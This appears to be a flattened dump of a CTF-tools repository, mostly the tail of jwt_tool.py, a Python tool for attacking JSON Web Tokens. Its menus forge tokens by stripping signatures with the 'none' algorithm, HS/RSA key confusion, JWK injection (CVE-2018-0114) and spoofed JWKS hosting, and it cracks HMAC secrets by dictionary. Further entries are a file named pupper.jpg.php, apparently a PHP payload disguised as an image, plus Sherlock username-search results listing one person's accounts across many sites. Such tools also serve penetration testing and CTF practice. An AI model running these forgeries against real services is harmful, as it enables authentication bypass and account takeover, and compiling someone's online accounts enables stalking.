"+str(paylDict[pair])) 771 | paylList.append(pair) 772 | i += 1 773 | delPair = eval(input("> ")) 774 | del paylDict[paylList[delPair]] 775 | elif selection == i+3: 776 | print("Timestamp updating:") 777 | print("[1] Update earliest timestamp to current time (keeping offsets)") 778 | print("[2] Add 1 hour to timestamps") 779 | print("[3] Add 1 day to timestamps") 780 | print("[4] Remove 1 hour from timestamps") 781 | print("[5] Remove 1 day from timestamps") 782 | print("\nPlease select an option from above (1-5):") 783 | try: 784 | selection = int(input("> ")) 785 | except: 786 | print("Invalid selection") 787 | exit(1) 788 | if selection == 1: 789 | nowtime = int(datetime.datetime.now().timestamp()) 790 | timecomp = {} 791 | for timestamp in comparestamps: 792 | timecomp[timestamp] = paylDict[timestamp] 793 | earliest = min(timecomp, key=timecomp.get) 794 | earlytime = paylDict[earliest] 795 | for timestamp in comparestamps: 796 | if timestamp == earliest: 797 | paylDict[timestamp] = nowtime 798 | else: 799 | difftime = int(paylDict[timestamp])-int(earlytime) 800 | paylDict[timestamp] = nowtime+difftime 801 | elif selection == 2: 802 | for timestamp in comparestamps: 803 | newVal = int(paylDict[timestamp])+3600 804 | paylDict[timestamp] = newVal 805 | elif selection == 3: 806 | for timestamp in comparestamps: 807 | newVal = int(paylDict[timestamp])+86400 808 | paylDict[timestamp] = newVal 809 | elif selection == 4: 810 | for timestamp in comparestamps: 811 | newVal = int(paylDict[timestamp])-3600 812 | paylDict[timestamp] = newVal 813 | elif selection == 5: 814 | for timestamp in comparestamps: 815 | newVal = int(paylDict[timestamp])-86400 816 | paylDict[timestamp] = newVal 817 | else: 818 | print("Invalid selection") 819 | exit(1) 820 | elif selection == 0: 821 | break 822 | else: 823 | exit(1) 824 | print("\nToken Signing:") 825 | print("[1] Sign token with known HMAC-SHA 'secret'") 826 | print("[2] Sign token with RSA/ECDSA Private Key") 827 | print("[3] Strip signature using the \"none\" algorithm") 828 | print("[4] Sign with HS/RSA key confusion vulnerability") 829 | print("[5] Sign token with key file") 830 | print("[6] Inject a key and self-sign the token (CVE-2018-0114)") 831 | print("[7] Self-sign the token and export an external JWKS") 832 | print("[8] Keep original signature") 833 | print("\nPlease select an option from above (1-5):") 834 | try: 835 | selection = int(input("> ")) 836 | except: 837 | print("Invalid selection") 838 | exit(1) 839 | if selection == 1: 840 | print("\nPlease enter the known key:") 841 | key = input("> ") 842 | print("\nPlease enter the keylength:") 843 | print("[1] HMAC-SHA256") 844 | print("[2] HMAC-SHA384") 845 | print("[3] HMAC-SHA512") 846 | try: 847 | selLength = int(input("> ")) 848 | except: 849 | print("Invalid selection") 850 | exit(1) 851 | if selLength == 1: 852 | keyLength = 256 853 | elif selLength == 2: 854 | keyLength = 384 855 | elif selLength == 3: 856 | keyLength = 512 857 | else: 858 | print("Invalid selection") 859 | exit(1) 860 | newSig, badSig, newContents = signToken(headDict, paylDict, key, keyLength) 861 | print("\nYour new forged token:") 862 | print("[+] URL safe: "+newContents+"."+newSig) 863 | print("[+] Standard: "+newContents+"."+badSig+"\n") 864 | exit(1) 865 | if selection == 2: 866 | print("\nPlease select an option:") 867 | print("[1] RSA key signing") 868 | print("[2] ECDSA key signing") 869 | print("[3] PSS key signing") 870 | try: 871 | selLength = int(input("> ")) 872 | except: 873 | print("Invalid selection") 874 | exit(1) 875 | if selLength == 1: 876 | print("\nPlease select an option:") 877 | print("[1] Generate new RSA key pair") 878 | print("[2] Use existing RSA Private Key") 879 | try: 880 | selLength = int(input("> ")) 881 | except: 882 | print("Invalid selection") 883 | exit(1) 884 | if selLength == 1: 885 | nowtime = str(int(datetime.datetime.now().timestamp())) 886 | pubKey, privKey = newRSAKeyPair() 887 | privKeyName = "private_jwttool_RSA_"+nowtime+".pem" 888 | pubKeyName = "public_jwttool_RSA_"+nowtime+".pem" 889 | with open(privKeyName, 'w') as test_priv_out: 890 | test_priv_out.write(privKey.decode()) 891 | with open(pubKeyName, 'w') as test_pub_out: 892 | test_pub_out.write(pubKey.decode()) 893 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 894 | elif selLength == 2: 895 | print("\nPlease enter the filename of the RSA Private Key:") 896 | privKeyName = input("> ") 897 | else: 898 | print("Invalid selection") 899 | exit(1) 900 | print("\nPlease enter the keylength:") 901 | print("[1] RSA-256") 902 | print("[2] RSA-384") 903 | print("[3] RSA-512") 904 | try: 905 | selLength = int(input("> ")) 906 | except: 907 | print("Invalid selection") 908 | exit(1) 909 | if selLength == 1: 910 | keyLength = 256 911 | elif selLength == 2: 912 | keyLength = 384 913 | elif selLength == 3: 914 | keyLength = 512 915 | else: 916 | print("Invalid selection") 917 | exit(1) 918 | newSig, badSig, newContents = signTokenRSA(headDict, paylDict, privKeyName, keyLength) 919 | print("\nYour new forged token:") 920 | print("[+] URL safe: "+newContents+"."+newSig) 921 | print("[+] Standard: "+newContents+"."+badSig+"\n") 922 | exit(1) 923 | elif selLength == 2: 924 | print("\nPlease select an option:") 925 | print("[1] Generate new ECDSA key pair") 926 | print("[2] Use existing ECDSA Private Key") 927 | try: 928 | selLength = int(input("> ")) 929 | except: 930 | print("Invalid selection") 931 | exit(1) 932 | if selLength == 1: 933 | nowtime = str(int(datetime.datetime.now().timestamp())) 934 | pubKey, privKey = newECKeyPair() 935 | privKeyName = "private_jwttool_EC_"+nowtime+".pem" 936 | pubKeyName = "public_jwttool_EC_"+nowtime+".pem" 937 | with open(privKeyName, 'w') as test_priv_out: 938 | test_priv_out.write(privKey) 939 | with open(pubKeyName, 'w') as test_pub_out: 940 | test_pub_out.write(pubKey) 941 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 942 | elif selLength == 2: 943 | print("\nPlease enter the filename of the ECDSA Private Key:") 944 | privKeyName = input("> ") 945 | else: 946 | print("Invalid selection") 947 | exit(1) 948 | print("\nPlease enter the keylength:") 949 | print("[1] ECDSA-256") 950 | print("[2] ECDSA-384") 951 | print("[3] ECDSA-512") 952 | try: 953 | selLength = int(input("> ")) 954 | except: 955 | print("Invalid selection") 956 | exit(1) 957 | if selLength == 1: 958 | keyLength = 256 959 | elif selLength == 2: 960 | keyLength = 384 961 | elif selLength == 3: 962 | keyLength = 512 963 | else: 964 | print("Invalid selection") 965 | exit(1) 966 | newSig, badSig, newContents = signTokenEC(headDict, paylDict, privKeyName, keyLength) 967 | print("\nYour new forged token:") 968 | print("[+] URL safe: "+newContents+"."+newSig) 969 | print("[+] Standard: "+newContents+"."+badSig+"\n") 970 | exit(1) 971 | elif selLength == 3: 972 | print("\nPlease select an option:") 973 | print("[1] Generate new RSA key pair") 974 | print("[2] Use existing RSA Private Key") 975 | try: 976 | selLength = int(input("> ")) 977 | except: 978 | print("Invalid selection") 979 | exit(1) 980 | if selLength == 1: 981 | nowtime = str(int(datetime.datetime.now().timestamp())) 982 | pubKey, privKey = newRSAKeyPair() 983 | privKeyName = "private_jwttool_RSA_"+nowtime+".pem" 984 | pubKeyName = "public_jwttool_RSA_"+nowtime+".pem" 985 | with open(privKeyName, 'w') as test_priv_out: 986 | test_priv_out.write(privKey.decode()) 987 | with open(pubKeyName, 'w') as test_pub_out: 988 | test_pub_out.write(pubKey.decode()) 989 | print("\nKey pair created and exported as:\n"+pubKeyName+"\n"+privKeyName+"\n") 990 | elif selLength == 2: 991 | print("\nPlease enter the filename of the RSA Private Key:") 992 | privKeyName = input("> ") 993 | else: 994 | print("Invalid selection") 995 | exit(1) 996 | print("\nPlease enter the keylength:") 997 | print("[1] RSA-256") 998 | print("[2] RSA-384") 999 | print("[3] RSA-512") 1000 | try: 1001 | selLength = int(input("> ")) 1002 | except: 1003 | print("Invalid selection") 1004 | exit(1) 1005 | if selLength == 1: 1006 | keyLength = 256 1007 | elif selLength == 2: 1008 | keyLength = 384 1009 | elif selLength == 3: 1010 | keyLength = 512 1011 | else: 1012 | print("Invalid selection") 1013 | exit(1) 1014 | newSig, badSig, newContents = signTokenPSS(headDict, paylDict, privKeyName, keyLength) 1015 | print("\nYour new forged token:") 1016 | print("[+] URL safe: "+newContents+"."+newSig) 1017 | print("[+] Standard: "+newContents+"."+badSig+"\n") 1018 | exit(1) 1019 | else: 1020 | print("Invalid selection") 1021 | exit(1) 1022 | elif selection == 3: 1023 | print("\nStripped Signature") 1024 | tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1025 | checkAlgNone(headDict, tok2) 1026 | exit(1) 1027 | elif selection == 4: 1028 | tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1029 | try: 1030 | checkPubKey(headDict, tok2, pubKey) 1031 | except: 1032 | print("\nPlease enter the Public Key filename:") 1033 | pubKey = input("> ") 1034 | checkPubKey(headDict, tok2, pubKey) 1035 | exit(1) 1036 | if selection == 5: 1037 | print("\nPlease enter the key file's filename:") 1038 | keyFile = input("> ") 1039 | print("\nLoading key file...") 1040 | try: 1041 | key1 = open(keyFile).read() 1042 | except: 1043 | print("Could not load file") 1044 | exit(1) 1045 | print("File loaded: "+keyFile) 1046 | print("\nPlease enter the keylength:") 1047 | print("[1] HMAC-SHA256") 1048 | print("[2] HMAC-SHA384") 1049 | print("[3] HMAC-SHA512") 1050 | try: 1051 | selLength = int(input("> ")) 1052 | except: 1053 | print("Invalid selection") 1054 | exit(1) 1055 | if selLength == 1: 1056 | keyLength = 256 1057 | elif selLength == 2: 1058 | keyLength = 384 1059 | elif selLength == 3: 1060 | keyLength = 512 1061 | else: 1062 | print("Invalid selection") 1063 | exit(1) 1064 | newSig, badSig, newContents = signToken(headDict, paylDict, key1, keyLength) 1065 | print("\nYour new forged token:") 1066 | print("[+] URL safe: "+newContents+"."+newSig) 1067 | print("[+] Standard: "+newContents+"."+badSig+"\n") 1068 | exit(1) 1069 | elif selection == 6: 1070 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1071 | newSig, badSig, newContents = jwksEmbed(headDict, paylDict) 1072 | print("\nYour new forged token:") 1073 | print("[+] "+newContents+"."+sig) 1074 | exit(1) 1075 | elif selection == 7: 1076 | print("\nPlease select an option:") 1077 | print("[1] Generate new RSA key pair") 1078 | print("[2] Use existing RSA Private Key") 1079 | try: 1080 | selLength = int(input("> ")) 1081 | except: 1082 | print("Invalid selection") 1083 | exit(1) 1084 | if selLength == 1: 1085 | privateKey = "" 1086 | elif selLength == 2: 1087 | print("\nPlease enter the Private Key filename:") 1088 | privateKey = input("> ") 1089 | print("\nLoading Private Key file...") 1090 | try: 1091 | keytest = open(privateKey).read() 1092 | except: 1093 | print("Could not load file") 1094 | exit(1) 1095 | else: 1096 | print("Invalid selection") 1097 | exit(1) 1098 | print("\nPlease enter the full URL where you will host the JWKS file:") 1099 | jku = input("> ") 1100 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1101 | try: 1102 | kid = headDict["kid"] 1103 | newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey, kid) 1104 | except: 1105 | kid = "" 1106 | newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey) 1107 | print("\nYour new forged token:") 1108 | print("(Signed with: "+privKeyName+")") 1109 | print("[+] "+newContents+"."+newSig) 1110 | print("\nPaste this JWKS into a new file at the following location: "+jku) 1111 | print("(Also exported as: "+jwksName+")") 1112 | print("[+]\n"+str(newjwks)) 1113 | exit(1) 1114 | elif selection == 8: 1115 | newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1116 | print("\nYour new forged token:") 1117 | print("[+] "+newContents+"."+sig) 1118 | exit(1) 1119 | else: 1120 | exit(1) 1121 | 1122 | def dissectPayl(paylDict, count=False): 1123 | timeseen = 0 1124 | comparestamps = [] 1125 | countval = 0 1126 | expiredtoken = False 1127 | nowtime = int(datetime.datetime.now().timestamp()) 1128 | for claim in paylDict: 1129 | countval += 1 1130 | if count: 1131 | placeholder = str(countval) 1132 | else: 1133 | placeholder = "+" 1134 | if claim in ["exp", "nbf", "iat"]: 1135 | timestamp = datetime.datetime.fromtimestamp(int(paylDict[claim])) 1136 | if claim == "exp": 1137 | if int(timestamp.timestamp()) < nowtime: 1138 | expiredtoken = True 1139 | print("["+placeholder+"] "+claim+" = "+str(paylDict[claim])+" ==> TIMESTAMP = "+timestamp.strftime('%Y-%m-%d %H:%M:%S')+" (UTC)") 1140 | timeseen += 1 1141 | comparestamps.append(claim) 1142 | else: 1143 | print("["+placeholder+"] "+claim+" = "+str(paylDict[claim])) 1144 | return comparestamps, expiredtoken 1145 | 1146 | def validateToken(): 1147 | try: 1148 | tok1, tok2, sig = jwt.split(".",3) 1149 | sig = base64.urlsafe_b64encode(base64.urlsafe_b64decode(sig + "=" * (-len(sig) % 4))).decode('UTF-8').strip("=") 1150 | contents = tok1+"."+tok2 1151 | contents = contents.encode() 1152 | head = base64.b64decode(tok1 + "=" * (-len(tok1) % 4)) 1153 | payl = base64.b64decode(tok2 + "=" * (-len(tok2) % 4)) 1154 | headDict = json.loads(head, object_pairs_hook=OrderedDict) 1155 | paylDict = json.loads(payl, object_pairs_hook=OrderedDict) 1156 | except: 1157 | print("Oh noes! Invalid token") 1158 | exit(1) 1159 | return headDict, paylDict, sig, contents 1160 | 1161 | def exploreToken(headDict, paylDict): 1162 | print("\n=====================\nExamine Token Values:\n=====================") 1163 | claims = 0 1164 | for claim in headDict: 1165 | if claim == "jku": 1166 | print("\n[+] jku: The 'JWKS URL' claim in the header is used to define the location of a JWKS file - a JSON file that stores signing key data. The main vulnerabilities here are:\n [*] the JWKS could contain private key data\n [*] the URL could be tampered with to point to a malicious JWKS\n [*] tampering a URL could force a lookup, leading to SSRF conditions") 1167 | claims += 1 1168 | elif claim == "kid": 1169 | print("\n[+] kid: The 'key ID' claim in the header identifies the key used for signing the token. This could be a key stored in a JWKS file at an externally-accessible URL (especially one named in a 'jku' claim), a similarly-named public key on the server's file system, a JWKS file on the server's file system, or within a JWKS file somewhere accessible only to the server. The main vulnerabilities here are tampering the value to:\n [*] prompt verbose errors\n [*] redirect to an alternative internal file to use for signing\n [*] perform command injection\n [*] perform other injection attacks") 1170 | claims += 1 1171 | elif claim == "x5u": 1172 | print("\n[+] x5u: The 'x509 Certificate URL' claim in the header is used to define the location of an x509 Certificate, used to sign the token - usually stored within a JWKS file that stores signing key data. The main vulnerabilities here are:\n [*] the x509 could contain sensitive data\n[*] the URL could be tampered with to point to a malicious x509 Certificate\n [*] tampering a URL could force a lookup, leading to SSRF conditions") 1173 | claims += 1 1174 | for claim in paylDict: 1175 | if claim == "iss": 1176 | print("\n[+] iss: The 'issuer' claim in the payload is used to define the 'principal' that issued the JWT. The main vulnerabilities here are:\n [*] a URL that reveals sensitive data.\n [*] tampering a URL could force a lookup, leading to SSRF conditions") 1177 | claims += 1 1178 | if claims == 0: 1179 | print("\nNo commonly-known vulnerable claims identified.\n") 1180 | 1181 | def rejigToken(headDict, paylDict, sig): 1182 | print("\n=====================\nDecoded Token Values:\n=====================") 1183 | print("\nToken header values:") 1184 | for claim in headDict: 1185 | if isinstance(headDict[claim], dict): 1186 | print("[+] "+claim+" = JSON object:") 1187 | for subclaim in headDict[claim]: 1188 | print(" [+] "+subclaim+" = "+str(headDict[claim][subclaim])) 1189 | else: 1190 | print("[+] "+claim+" = "+str(headDict[claim])) 1191 | print("\nToken payload values:") 1192 | comparestamps, expiredtoken = dissectPayl(paylDict) 1193 | if len(comparestamps) >= 2: 1194 | print("\nSeen timestamps:") 1195 | print("[*] "+comparestamps[0]+" was seen") 1196 | claimnum = 0 1197 | for claim in comparestamps: 1198 | timeoff = int(paylDict[comparestamps[claimnum]])-int(paylDict[comparestamps[0]]) 1199 | if timeoff != 0: 1200 | if timeoff < 0: 1201 | timeoff = timeoff*-1 1202 | prepost = "[-] "+claim+" is earlier than "+comparestamps[0]+" by: " 1203 | else: 1204 | prepost = "[+] "+claim+" is later than "+comparestamps[0]+" by: " 1205 | timecalc = timeoff 1206 | days,hours,mins = 0,0,0 1207 | if timecalc >= 86400: 1208 | days = str(timecalc/86400) 1209 | days = int(float(days)) 1210 | timecalc -= days*86400 1211 | if timecalc >= 3600: 1212 | hours = str(timecalc/3600) 1213 | hours = int(float(hours)) 1214 | timecalc -= hours*3600 1215 | if timecalc >= 60: 1216 | mins = str(timecalc/60) 1217 | mins = int(float(mins)) 1218 | timecalc -= mins*60 1219 | print(prepost+str(days)+" days, "+str(hours)+" hours, "+str(mins)+" mins") 1220 | claimnum += 1 1221 | if expiredtoken: 1222 | print("[-] TOKEN IS EXPIRED!") 1223 | print("\n----------------------\nJWT common timestamps:\niat = IssuedAt\nexp = Expires\nnbf = NotBefore\n----------------------") 1224 | return headDict, paylDict, sig 1225 | 1226 | if __name__ == '__main__': 1227 | # Print logo 1228 | print() 1229 | print(" $$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$$\ $$\ ") 1230 | print(" \__$$ |$$ | $\ $$ |\__$$ __| \__$$ __| $$ |") 1231 | print(" $$ |$$ |$$$\ $$ | $$ | $$ | $$$$$$\ $$$$$$\ $$ |") 1232 | print(" $$ |$$ $$ $$\$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ |") 1233 | print("$$\ $$ |$$$$ _$$$$ | $$ | $$ |$$ / $$ |$$ / $$ |$$ |") 1234 | print("$$ | $$ |$$$ / \$$$ | $$ | $$ |$$ | $$ |$$ | $$ |$$ |") 1235 | print("\$$$$$$ |$$ / \$$ | $$ | $$ |\$$$$$$ |\$$$$$$ |$$ |") 1236 | print(" \______/ \__/ \__| \__|$$$$$$\\__| \______/ \______/ \__|") 1237 | print(" Version 1.3.2 \______| ") 1238 | print() 1239 | 1240 | parser = argparse.ArgumentParser(epilog="If you don't have a token, try this one:\neyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po", formatter_class=argparse.RawTextHelpFormatter) 1241 | parser.add_argument("jwt", type=str, 1242 | help="the JWT to tinker with") 1243 | parser.add_argument("-R", "--readtoken", action="store_true", 1244 | help="read and analyse JWT contents") 1245 | parser.add_argument("-X", "--explore", action="store_true", 1246 | help="eXplore the potential issues with a token") 1247 | parser.add_argument("-T", "--tamper", action="store_true", 1248 | help="tamper with the JWT contents") 1249 | parser.add_argument("-C", "--crack", action="store_true", 1250 | help="crack key for an HMAC-SHA token") 1251 | parser.add_argument("-J", "--jwkscheck", action="store_true", 1252 | help="validate and process a JWKS file") 1253 | parser.add_argument("-A", "--algnone", action="store_true", 1254 | help="EXPLOIT: test the \"alg\": \"none\" vulnerability") 1255 | parser.add_argument("-K", "--keyconf", action="store_true", 1256 | help="EXPLOIT: test the HMAC-SHA/RSA key confusion vulnerability") 1257 | parser.add_argument("-I", "--injectjwk", action="store_true", 1258 | help="EXPLOIT: inject a key and self-sign the token (CVE-2018-0114)") 1259 | parser.add_argument("-S", "--spoofjwk", action="store_true", 1260 | help="EXPLOIT: self-sign a key and output a JWKS ") 1261 | parser.add_argument("-V", "--verify", action="store_true", 1262 | help="verify the RSA signature against a Public Key") 1263 | parser.add_argument("-d", "--dict", action="store", 1264 | help="dictionary file for cracking") 1265 | parser.add_argument("-p", "--password", action="store", 1266 | help="password for cracking") 1267 | parser.add_argument("-k", "--keyfile", action="store", 1268 | help="keyfile for cracking") 1269 | parser.add_argument("-pk", "--pubkey", action="store", 1270 | help="Public Key for Asymmetric crypto") 1271 | parser.add_argument("-pr", "--privatekey", action="store", 1272 | help="Private Key for Asymmetric crypto") 1273 | parser.add_argument("-jw", "--jwksfile", action="store", 1274 | help="JSON Web Key Store for Asymmetric crypto") 1275 | parser.add_argument("-u", "--urlinject", action="store", 1276 | help="URL location where you can host a spoofed JWKS") 1277 | args = parser.parse_args() 1278 | jwt = args.jwt 1279 | key = "" 1280 | pubKey = "" 1281 | privateKey = "" 1282 | keyList = "" 1283 | keyFile = "" 1284 | jwksfile = "" 1285 | urlinject = "" 1286 | headDict, paylDict, sig, contents = validateToken() 1287 | tok2 = base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 1288 | if args.dict: 1289 | keyList = args.dict 1290 | if args.keyfile: 1291 | keyFile = args.keyfile 1292 | if args.password: 1293 | key = args.password 1294 | if args.pubkey: 1295 | pubKey = args.pubkey 1296 | if args.privatekey: 1297 | privateKey = args.privatekey 1298 | if args.jwksfile: 1299 | jwksfile = args.jwksfile 1300 | if args.urlinject: 1301 | urlinject = args.urlinject 1302 | 1303 | # menu from args 1304 | if args.tamper: 1305 | tamperToken(paylDict, headDict, sig) 1306 | exit(1) 1307 | if args.verify: 1308 | algType = headDict["alg"][0:2] 1309 | if algType == "RS": 1310 | if pubKey: 1311 | verifyTokenRSA(headDict, paylDict, sig, pubKey) 1312 | else: 1313 | print("No Public Key provided (-pk)\n") 1314 | parser.print_usage() 1315 | exit(1) 1316 | elif algType == "ES": 1317 | if pubKey: 1318 | verifyTokenEC(headDict, paylDict, sig, pubKey) 1319 | else: 1320 | print("No Public Key provided (-pk)\n") 1321 | parser.print_usage() 1322 | exit(1) 1323 | elif algType == "PS": 1324 | if pubKey: 1325 | verifyTokenPSS(headDict, paylDict, sig, pubKey) 1326 | else: 1327 | print("No Public Key provided (-pk)\n") 1328 | parser.print_usage() 1329 | exit(1) 1330 | else: 1331 | print("Algorithm not supported for verification") 1332 | exit(1) 1333 | if args.readtoken: 1334 | rejigToken(headDict, paylDict, sig) 1335 | exit(1) 1336 | if args.explore: 1337 | rejigToken(headDict, paylDict, sig) 1338 | exploreToken(headDict, paylDict) 1339 | exit(1) 1340 | if args.jwkscheck: 1341 | if jwksfile: 1342 | parseJWKS(jwksfile) 1343 | else: 1344 | print("No JWKS file provided (-jw)\n") 1345 | parser.print_usage() 1346 | exit(1) 1347 | if args.algnone: 1348 | checkAlgNone(headDict, tok2) 1349 | exit(1) 1350 | if args.injectjwk: 1351 | newSig, badSig, newContents = jwksEmbed(headDict, paylDict) 1352 | print("[+] New injected token: "+newContents+"."+newSig) 1353 | exit(1) 1354 | if args.spoofjwk: 1355 | if urlinject: 1356 | jku = urlinject 1357 | try: 1358 | kid = headDict["kid"] 1359 | newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey, kid) 1360 | except: 1361 | kid = "" 1362 | newSig, badSig, newContents, newjwks, privKeyName, jwksName = jwksGen(headDict, paylDict, jku, privateKey) 1363 | print("\nYour new forged token:") 1364 | print("(Signed with: "+privKeyName+")") 1365 | print("[+] "+newContents+"."+newSig) 1366 | print("\nPaste this JWKS into a new file at the following location: "+jku) 1367 | print("(Also exported as: "+jwksName+")") 1368 | print("[+]\n"+str(newjwks)) 1369 | exit(1) 1370 | else: 1371 | print("No URL provided to spoof the JWKS (-u)\n") 1372 | parser.print_usage() 1373 | exit(1) 1374 | if args.keyconf: 1375 | if pubKey: 1376 | checkPubKey(headDict, tok2, pubKey) 1377 | else: 1378 | print("No Public Key provided (-pk)\n") 1379 | parser.print_usage() 1380 | exit(1) 1381 | if args.crack: 1382 | if args.password: 1383 | print("Password provided, checking if valid...") 1384 | checkSig(sig, contents, key) 1385 | elif args.dict: 1386 | crackSig(sig, contents) 1387 | elif args.keyfile: 1388 | checkSigKid(sig, contents) 1389 | else: 1390 | print("No cracking option supplied:\nPlease specify a password/dictionary/Public Key\n") 1391 | parser.print_usage() 1392 | exit(1) 1393 | 1394 | # Show token deconstructed 1395 | rejigToken(headDict, paylDict, sig) 1396 | # Main menu 1397 | print("\n\n########################################################") 1398 | print("# Options: #") 1399 | print("# ==== TAMPERING ==== #") 1400 | print("# 1: Tamper with JWT data (multiple signing options) #") 1401 | print("# #") 1402 | print("# ==== VULNERABILITIES ==== #") 1403 | print("# 2: Check for the \"none\" algorithm vulnerability #") 1404 | print("# 3: Check for HS/RSA key confusion vulnerability #") 1405 | print("# 4: Check for JWKS key injection vulnerability #") 1406 | print("# #") 1407 | print("# ==== CRACKING/GUESSING ==== #") 1408 | print("# 5: Check HS signature against a key (password) #") 1409 | print("# 6: Check HS signature against key file #") 1410 | print("# 7: Crack signature with supplied dictionary file #") 1411 | print("# #") 1412 | print("# ==== RSA KEY FUNCTIONS ==== #") 1413 | print("# 8: Verify RSA signature against a Public Key #") 1414 | print("# #") 1415 | print("# 0: Quit #") 1416 | print("########################################################") 1417 | print("\nPlease make a selection (1-6)") 1418 | try: 1419 | selection = int(input("> ")) 1420 | except: 1421 | print("Invalid selection") 1422 | exit(1) 1423 | if selection == 1: 1424 | tamperToken(paylDict, headDict, sig) 1425 | elif selection == 2: 1426 | checkAlgNone(headDict, tok2) 1427 | elif selection == 3: 1428 | if not pubKey: 1429 | print("\nPlease enter the Public Key filename:") 1430 | pubKey = input("> ") 1431 | checkPubKey(headDict, tok2, pubKey) 1432 | elif selection == 4: 1433 | newSig, badSig, newContents = jwksEmbed(headDict, paylDict) 1434 | print("[+] New injected token: "+newContents+"."+newSig) 1435 | elif selection == 5: 1436 | checkSig(sig, contents, key) 1437 | elif selection == 6: 1438 | if keyFile != "": 1439 | checkSigKid(sig, contents) 1440 | else: 1441 | print("Please provide filename for key file.\n") 1442 | keyFile = input("> ") 1443 | checkSigKid(sig, contents) 1444 | elif selection == 7: 1445 | if keyList != "": 1446 | crackSig(sig, contents) 1447 | else: 1448 | print("Please provide filename for dictionary file.\n") 1449 | keyList = input("> ") 1450 | crackSig(sig, contents) 1451 | elif selection == 8: 1452 | algType = headDict["alg"][0:2] 1453 | if algType == "RS": 1454 | try: 1455 | verifyTokenRSA(headDict, paylDict, sig, pubKeyName) 1456 | except: 1457 | print("Please provide filename for Public Key.\n") 1458 | pubKeyName = input("> ") 1459 | verifyTokenRSA(headDict, paylDict, sig, pubKeyName) 1460 | elif algType == "ES": 1461 | try: 1462 | verifyTokenEC(headDict, paylDict, sig, pubKeyName) 1463 | except: 1464 | print("Please provide filename for Public Key.\n") 1465 | pubKeyName = input("> ") 1466 | verifyTokenEC(headDict, paylDict, sig, pubKeyName) 1467 | else: 1468 | print("Algorithm not supported for verification") 1469 | exit(1) 1470 | else: 1471 | exit(1) 1472 | exit(1) 1473 | -------------------------------------------------------------------------------- /pupper.jpg.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Scar26/CTF-tools/4c88fe9133159751d610f88051ce27a946bc07d6/pupper.jpg.php -------------------------------------------------------------------------------- /sherlock/.dockerignore: -------------------------------------------------------------------------------- 1 | .git/ 2 | .vscode/ 3 | screenshot/ 4 | tests/ 5 | *.txt 6 | !/requirements.txt -------------------------------------------------------------------------------- /sherlock/.travis.yml: -------------------------------------------------------------------------------- 1 | group: travis_latest 2 | language: python 3 | cache: pip 4 | matrix: 5 | allow_failures: 6 | - python: nightly 7 | - name: "Sherlock Site Coverage Tests" 8 | fast_finish: true 9 | include: 10 | - python: 3.6 11 | - python: 3.7 12 | - python: 3.8 13 | - python: nightly 14 | - python: 3.7 15 | before_script: true # override the flake8 tests 16 | name: "Sherlock Site Coverage Tests" 17 | script: python -m unittest tests.all.SherlockSiteCoverageTests --buffer --verbose 18 | install: 19 | - pip install flake8 -r requirements.txt 20 | before_script: 21 | # stop the build if there are Python syntax errors or undefined names 22 | - flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics 23 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide 24 | - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics 25 | script: 26 | - python -m unittest tests.all.SherlockDetectTests --buffer --verbose || true 27 | notifications: 28 | on_success: change 29 | on_failure: change # `always` will be the setting once code changes slow down 30 | -------------------------------------------------------------------------------- /sherlock/Alpha-maniak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$Alpha-maniak 2 | https://fortnitetracker.com/profile/all/Alpha-maniak 3 | https://www.gpsies.com/mapUser.do?username=Alpha-maniak 4 | http://Alpha-maniak.insanejournal.com/profile 5 | https://www.meetme.com/Alpha-maniak 6 | https://yandex.ru/collections/user/Alpha-maniak/ 7 | https://bbs.boingboing.net/u/Alpha-maniak 8 | https://elwo.ru/index/8-0-Alpha-maniak 9 | https://www.opennet.ru/~Alpha-maniak 10 | http://pedsovet.su/index/8-0-Alpha-maniak 11 | https://radioskot.ru/index/8-0-Alpha-maniak 12 | Total Websites Username Detected On : 11 -------------------------------------------------------------------------------- /sherlock/AlphaManiak.txt: -------------------------------------------------------------------------------- 1 | https://cash.me/$AlphaManiak 2 | https://www.duolingo.com/profile/AlphaManiak 3 | https://www.ebay.com/usr/AlphaManiak 4 | https://www.facebook.com/AlphaManiak 5 | https://fortnitetracker.com/profile/all/AlphaManiak 6 | https://www.gpsies.com/mapUser.do?username=AlphaManiak 7 | http://AlphaManiak.insanejournal.com/profile 8 | https://www.instagram.com/AlphaManiak 9 | https://www.meetme.com/AlphaManiak 10 | https://www.pinterest.com/AlphaManiak/ 11 | https://www.reddit.com/user/AlphaManiak 12 | https://www.roblox.com/user.aspx?username=AlphaManiak 13 | https://soundcloud.com/AlphaManiak 14 | https://t.me/AlphaManiak 15 | https://www.twitter.com/AlphaManiak 16 